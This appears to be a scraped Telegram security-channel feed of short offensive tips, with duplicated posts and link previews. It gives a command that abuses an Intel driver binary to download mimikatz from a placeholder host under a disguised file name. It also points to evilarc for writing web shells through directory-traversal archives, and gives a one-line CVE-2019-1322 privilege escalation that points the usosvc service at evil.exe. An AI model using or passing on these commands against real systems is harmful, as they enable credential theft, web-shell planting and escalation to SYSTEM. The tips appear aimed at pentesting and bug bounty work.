file downloader (Intel Graphics Driver for Windows 10)
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"
evilarc lets you create a zip file that contains files with directory traversal characters in their embedded path.
Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function
https://github.com/ptoomey3/evilarc
#BugBounty
Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function
https://github.com/ptoomey3/evilarc
#BugBounty
GitHub
GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilities
Create tar/zip archives that can exploit directory traversal vulnerabilities - ptoomey3/evilarc
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!